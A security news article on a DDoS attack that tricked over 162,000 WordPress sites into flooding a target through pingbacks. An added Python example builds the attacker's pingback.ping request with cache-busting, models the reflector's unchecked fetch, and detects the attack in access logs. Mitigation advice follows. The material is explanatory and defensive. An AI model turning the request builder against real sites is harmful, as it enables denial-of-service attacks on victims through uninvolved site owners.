If you’re a bad guy wanting to blast a website off the internet, the obvious method is to use a distributed denial-of-service (DDoS) attack.
DDoS attacks typically use a botnet of compromised computers in a co-ordinated attack, flooding a particular site with more requests than it can serve. The victim site can’t cope with the barrage, and – unless properly prepared – falls over.
Many sites would have the same problem if hordes of Justin Bieber fans all clicked on a link he had tweeted at the same time.
But what if you don’t have access to a botnet of compromised computers, or can’t talk Justin Bieber into tweeting a URL of your choosing?
Well, maybe you’ll take advantage of the millions of unsuspecting websites out there running WordPress.
Sucuri has blogged this week about a DDoS attack which brought down a website, after over 162,000 websites running WordPress were all tricked into sending it unwanted traffic.
The attack relied upon Pingbacks – a feature of WordPress that allows a site running WordPress to inform other sites when you write a blog post linking to them. A pingback is an XML-RPC call (pingback.ping) sent to the linked site’s xmlrpc.php endpoint; before listing the pingback as a comment, the receiving site fetches the linking page to confirm that the link really exists.
But the WordPress sites were not hacked or compromised. Instead, with a single command-line HTTP request (curl will do), a remote attacker can POST a pingback.ping call to any WordPress site, naming the target site as the page that supposedly links to one of that site’s posts. The WordPress site dutifully fetches the target URL to verify the link, and so sends an HTTP request to the victim on the attacker’s behalf. Repeat that across tens of thousands of WordPress sites, with a random query string on the URL so that caches don’t absorb the hits, and you have a DDoS.
Pingback is enabled by default on WordPress sites, meaning that the vast majority of websites running the software could probably be recruited into a DDoS attack without their owners’ knowledge.
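To make the mechanism concrete, here is an added example (not code from Sucuri, Incapsula or WordPress itself) that builds the pingback.ping request an attacker would POST to a reflector’s xmlrpc.php, models the reflector’s decision to fetch the attacker-chosen URL, and then scans a victim’s access log for the tell-tale user agent that WordPress uses when verifying pingbacks. The reflector check is a simplified model of what WordPress does, not its actual code; the hostnames, IP addresses and log lines are all constructed for the example, and nothing here touches the network.

```python
"""WordPress pingback reflection, end to end (added example, constructed data).

1. build_pingback_request(): the XML-RPC body the attacker POSTs to a reflector.
2. reflector_fetch_url(): simplified model of the reflector deciding what to fetch.
3. find_pingback_reflections(): victim-side detection over access-log lines.
"""
import re
import secrets
import xmlrpc.client
from collections import Counter
from urllib.parse import urlparse


def build_pingback_request(victim_url: str, reflector_post_url: str,
                           cache_bust: bool = True) -> bytes:
    """pingback.ping(sourceURI, targetURI) as the attacker sends it.

    sourceURI is the page that supposedly links to the reflector's post, and it
    is the URL the reflector will fetch. A random query string makes every fetch
    a cache miss, so each request reaches the victim's origin server.
    """
    if cache_bust:
        victim_url = f"{victim_url}?{secrets.token_hex(4)}"
    return xmlrpc.client.dumps((victim_url, reflector_post_url),
                               methodname="pingback.ping").encode()


def parse_pingback_request(body: bytes):
    """What the reflector's XML-RPC server decodes: (method, sourceURI, targetURI)."""
    params, method = xmlrpc.client.loads(body.decode())
    source_uri, target_uri = params
    return method, source_uri, target_uri


def reflector_fetch_url(body: bytes, own_host: str):
    """Simplified model (an assumption, not WordPress's exact logic) of the
    reflector's handling: it checks that targetURI points at itself and, if so,
    fetches sourceURI to look for a backlink. sourceURI is never checked against
    anything, which is exactly why the attacker can point it at a victim."""
    method, source_uri, target_uri = parse_pingback_request(body)
    if method != "pingback.ping":
        return None
    if urlparse(target_uri).hostname != own_host:
        return None  # real WordPress answers with an XML-RPC fault here
    return source_uri


# Apache/nginx "combined" log format (constructed sample lines below).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

# WordPress fetches pingback sources with a UA of "WordPress/<ver>; <site URL>";
# recent versions append "; verifying pingback from <IP of whoever sent the
# XML-RPC call>", which on a reflected attack is the attacker's address.
PINGBACK_UA = re.compile(
    r'^WordPress/[\d.]+; (?P<site>\S+)(?:; verifying pingback from (?P<origin>\S+))?$')


def find_pingback_reflections(log_lines, min_reflectors: int = 2) -> dict:
    """Count pingback-verification fetches per reflector IP and tally the
    origin IPs the reflectors report. Many distinct reflectors hitting one site
    in a short window is the signature of this attack."""
    reflectors, origins, hits = Counter(), Counter(), 0
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ua = PINGBACK_UA.match(m["ua"])
        if not ua:
            continue
        hits += 1
        reflectors[m["ip"]] += 1
        if ua["origin"]:
            origins[ua["origin"]] += 1
    return {"hits": hits, "reflectors": dict(reflectors),
            "claimed_origins": dict(origins),
            "suspicious": len(reflectors) >= min_reflectors}


# Constructed victim-side log: three WordPress reflectors (one on an older
# version without the "verifying pingback from" suffix) plus one real browser.
SAMPLE_LOG = [
    '203.0.113.10 - - [10/Mar/2014:12:00:01 +0000] "GET /?a1b2c3d4 HTTP/1.0" 200 5120 "-" '
    '"WordPress/3.8.1; http://blog-a.example; verifying pingback from 198.51.100.7"',
    '203.0.113.11 - - [10/Mar/2014:12:00:01 +0000] "GET /?e5f60718 HTTP/1.0" 200 5120 "-" '
    '"WordPress/3.8.1; http://blog-b.example; verifying pingback from 198.51.100.7"',
    '203.0.113.12 - - [10/Mar/2014:12:00:02 +0000] "GET /?9a0b1c2d HTTP/1.0" 200 5120 "-" '
    '"WordPress/3.6; http://old-blog.example"',
    '203.0.113.10 - - [10/Mar/2014:12:00:02 +0000] "GET /?3e4f5061 HTTP/1.0" 200 5120 "-" '
    '"WordPress/3.8.1; http://blog-a.example; verifying pingback from 198.51.100.7"',
    '192.0.2.44 - - [10/Mar/2014:12:00:03 +0000] "GET / HTTP/1.1" 200 5120 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64) Firefox/27.0"',
]

if __name__ == "__main__":
    body = build_pingback_request("http://victim.example/", "http://blog-a.example/p/1")
    print(body.decode())
    print("reflector fetches:", reflector_fetch_url(body, "blog-a.example"))
    print(find_pingback_reflections(SAMPLE_LOG))
```

Two things worth noting from running it: the reflector only ever validates targetURI (is this one of my posts?), so any attacker who can find a single public post URL on a WordPress site can aim that site’s fetch anywhere; and on the victim side the “verifying pingback from” suffix hands you the address that sent the XML-RPC calls, which is useful for blocking and for abuse reports to the reflectors’ hosts. Older reflectors that don’t add the suffix still stand out by the WordPress user agent and the random query strings.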
Here’s a natty graphic from the folks at Incapsula, showing how attackers can exploit WordPress’s Pingback feature to launch a DDoS attack.
In a similar attack last year, Incapsula described how hackers had exploited the same trick on approximately 2500 WordPress websites, including ones run by Trend Micro, Gizmodo and Zendesk.
At the time, Incapsula issued a chilling warning:
This gives any attacker a virtually limitless set of IP addresses to distribute a Denial of Service attack across a network of over 100 million WordPress sites, without having to compromise them.
Clearly things haven’t changed much in the intervening year, and there are still plenty of WordPress sites out there which could be easily recruited into criminal DDoS attacks.
If you administer a self-hosted WordPress site then read Sucuri’s blog for advice on how to best ensure that your website isn’t aiding a DDoS attack. The core of it is to remove the pingback.ping method from XML-RPC (WordPress’s xmlrpc_methods filter lets a few lines of plugin code do that) while leaving the rest of XML-RPC working; blocking xmlrpc.php outright also works, but only if nothing else on your site, such as the mobile apps or remote publishing tools, depends on it.